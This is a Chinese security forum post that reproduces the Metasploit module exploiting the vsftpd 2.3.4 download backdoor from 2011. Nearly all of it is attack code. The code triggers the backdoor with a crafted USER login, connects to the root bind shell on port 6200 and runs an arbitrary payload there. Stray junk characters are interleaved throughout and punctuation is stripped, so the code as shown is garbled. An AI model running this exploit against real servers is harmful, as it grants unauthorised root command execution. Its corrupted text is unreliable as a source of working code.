最近看过此主题的会员

返回列表 发帖
VSFTPD v2.3.4 Backdoor 命令执行漏洞
################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
, @& ]$ ^  U- s" k5 u& Z9 C! ~6 L( X
" V7 y0 V& e# y0 Z8 W& I- H& e1 }

- X* p+ W* y! T# B0 brequire msf/core
9 |; G+ T, G; s4 l2 s0 U
: Z$ k+ m' }; @% Fclass Metasploit3 < Msf::Exploit::Remote
/ |$ H6 }9 e& A* h; n- DRank = ExcellentRanking7 n0 v: Z, g- o% K0 Q6 M7 w
+ `) \6 f, \( N8 c6 d
include Msf::Exploit::Remote::Tcp. D% ~& f7 G9 p1 O3 J& I

3 D; ?" j6 o( m  q$ y: Pdef initialize(info = {})6 U' Z' I* \  W- k) j
super(update_info(info
  d6 S' R% B' \& T- C9 rName => VSFTPD v2.3.4 Backdoor Command Execution
& r" Z+ ~6 b# P; J: s* c& K: gDescript_ion => %q{
. e7 ]; K( V: u7 ?) OThis module exploits a malicious backdoor that was added to the VSFTPD download0 g& b( ?: [0 {
archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
% Z" I6 n- ^8 L) Q7 }, p7 fJune 30th 2011 and July 1st 2011 according to the most recent information
4 i. x! q( p0 G4 Y9 ]* U, Favailable. This backdoor was removed on July 3rd 2011.
& [  d  i. Z+ \2 d}
4 O$ N" K. `. o8 A" r- bAuthor => [ hdm mc ]
0 M% i0 Z9 A5 r, oLicense => MSF_LICENSE. L7 j/ V: G" ?! K. W7 l6 N
Version => $Revision: 13099 $
. p& z4 B2 N/ Z$ \% H' KReferences =>/ d8 i* X  ~' A; |5 F
[! V7 M/ d1 W5 G  ?% R
[ URL http://pastebin.com/AetT9sS5]
9 M" E! E& b" T" y- T+ r2 b[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]+ q( X1 _, @( ]2 U6 e" E
]3 F4 z) \5 U; g$ K" `5 v. j& Y
Privileged => true
3 L5 c5 t! U) W+ y* gPlatform => [ unix ]
& J# ~( y& u3 F5 ~; @) RArch => ARCH_CMD
, [& O) I# A2 I6 e( G" {/ hPayload =>
2 D0 _7 Y. ~$ V* u' b{0 v7 ~& E! K: d4 w) B; @) ?) a
Space => 20005 |) t3 D" i- P7 b4 a
BadChars =>
6 t/ V% ?5 i; Q7 mDisableNops => true
# P$ D; _2 H% C$ l: lCompat =>- O5 q. M9 ^% d- Y1 s- g& ?
{
# N* x2 x+ ^- j* E5 oPayloadType => cmd_interact" g! n0 {0 D. z, K9 X
ConnectionType => find* j$ Q$ _, j9 w$ Q- Y
}7 `3 r) H. D9 i9 E3 J
}
! \5 @* d' k) s; OTargets =>
0 W& j1 f' H* [3 O[: `6 w/ \, q/ X* r! [, w
[ Automatic { } ]6 g. f, Y1 g  t5 r& r0 |8 e9 h
]9 h2 K2 K5 l( p0 o$ \: y, z
DisclosureDate => Jul 3 2011! x& H) s  p4 r$ n$ e4 a+ Z
DefaultTarget => 0))  |& p) i! h2 }% x; D) }1 l

) O3 O% ~( }- Y( Q- }7 wregister_options([ Opt::RPORT(21) ] self.class)2 O. Q7 B& J# Z5 E! ?# l5 }  c
end" H! t) W5 h$ M/ L
- n' L8 _  L8 y* G! ]. d
def exploit
& Y& C6 _* R8 x) v% ?" O
& _, [! q5 }) M1 ^! ansock = self.connect(false {RPORT => 6200}) rescue nil* o- x& s/ z( v$ O& Y3 M# _5 p
if nsock0 p5 [4 U: a/ T7 _, `1 I) f) U4 _5 e6 j
print_status(The port used by the backdoor bind listener is already open)) [6 W6 L. R- O* y6 o; s" _
handle_backdoor(nsock)3 y2 H$ i: M- c1 Z" O
return$ k, ~) {6 h4 [/ Q& N6 v- V; j
end- Y& g& j' Z! L+ X

  m( p8 C) A/ Y% @: q7 w# Connect to the FTP service port first
; L8 i: q6 j3 _5 zconnect
) i+ J6 z. x' R8 y( ~; \2 J1 E2 s& B1 P5 y  n& K9 U; f
banner = sock.get_once(-1 30).to_s9 D- y0 g- j1 Y1 r9 o4 q0 f& A
print_status(Banner: #{banner.strip})
4 l0 z" s$ j+ G; b- N- r5 H' e9 f1 O& ?* K
sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:). M" p, D5 K; \
)2 d; t5 R) w  b2 `5 c
resp = sock.get_once(-1 30).to_s
) f9 o( h0 T& N' Tprint_status(USER: #{resp.strip})5 q) e+ P- N+ V5 v

1 ]7 Q& t: ~$ z2 t% c7 A! aif resp =~ /^530 /
; p. h5 t" ~  B* hprint_error(This server is configured for anonymous only and the backdoor code cannot be reached)7 _$ w* K1 t  v. U2 v
disconnect
. d# S7 M8 {5 U/ d! Y/ Creturn
. n& ^5 b% x7 q% rend$ U2 C% S2 u: [$ ~5 j

+ i, q0 _) U; b1 Rif resp !~ /^331 /
% O, P1 p8 Z' U+ p/ \+ M2 s8 vprint_error(This server did not respond as expected: #{resp.strip})
5 V' ?/ e/ e% Tdisconnect* G, p1 p8 J& Z5 \  D& Z
return8 h* ]) D9 y/ G
end- \/ [: j# i& u$ |0 w2 v' L
0 l6 I' B7 \$ K( y
sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}4 O! \$ X2 _$ S/ k. _  D: Y
)
9 l6 p8 G% E4 S% ^" A" }/ I3 L7 I2 c  P
# Do not bother reading the response from password just try the backdoor
# s( ~6 Z* \/ k+ G3 g2 d* ^, D/ n, Bnsock = self.connect(false {RPORT => 6200}) rescue nil
$ p6 B0 m+ P: ?6 m( z+ Gif nsock
: a% m) x& i2 Vprint_good(Backdoor service has been spawned handling...)( ?: m* N+ U' B& d5 F
handle_backdoor(nsock)& O2 V) A' o& L8 u0 B/ D. \" c
return) w# s( U+ y+ B5 }: B1 s) p
end
2 R$ k, _5 E+ ^1 ~( F, ?) I& p2 X
disconnect8 Z3 T# }3 `( ?! ]3 w
9 F( b8 h! o2 q2 K5 E# G
end
* c( K+ h5 M: C6 o
# W! A6 j" o& udef handle_backdoor(s)
( e% ?& J% K: C5 {1 }( L3 x  I$ N/ x. l; G" A& I
s.put(id
; c. w8 m; |) l/ _+ ?- w)0 c6 Q% S+ X( \: ]; O

# [6 b6 p; V0 Y. p2 i6 |; c( \r = s.get_once(-1 5).to_s
, t* G" m! q* oif r !~ /uid=/
  {9 I4 P9 a4 X! f' D( D$ L7 _) }# jprint_error(The service on port 6200 does not appear to be a shell), N( @) p5 v) k/ z: {- i1 p9 R
disconnect(s)
2 H. \& f6 n' s" Breturn
1 R6 h8 o3 n. l( A+ A. h& iend
/ r& `( Y2 C; x  f+ N
% I, ?0 P$ O; N. G1 Yprint_good(UID: #{r.strip}): A# o; ~9 c* ^2 K9 U: W8 b7 v
  B* s5 T0 |; f7 X4 G3 I6 m. L" [
s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)  E( ?3 i  `( L. U6 |5 u
handler(s)
2 t2 `9 |$ G- ?. i1 mend
8 A8 Y' b& q9 a- g! G
* U$ a$ o' U6 Z1 rend复制代码
$ {3 X. f1 \$ a2 F0 P3 s
3 N* ?) M/ V$ v& P
5 k# q! f$ m5 H/ o8 t8 M& M$ `' M& @6 C& N' n
+ s8 ?  [+ E2 r* f* S5 K
3 W8 o! r4 z% C: |* x% k

8 W% ^3 A8 k1 N& G9 ?' L1 B# }: ?+ r- M6 C! V

5 t* @. O# m: @- z4 T  S9 f
2 ~6 m) P) u4 t2 v1 H
4 j( D2 D/ m2 P/ y' w% E
7 z. g' b3 u  Q( U# a3 ~
3 N% l2 s# z' o. A5 G2 h* ~
) p9 d& I2 T4 E, l9 f+ X7 g
: H  V6 N  {2 @0 _, q# m* x3 y8 n# T7 X9 u' k7 b9 i; z

- {! d5 U6 X/ Y+ B& g  x/ X' M
3 K. i# e( F: B! N
; f' \8 S. V+ Z公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

返回列表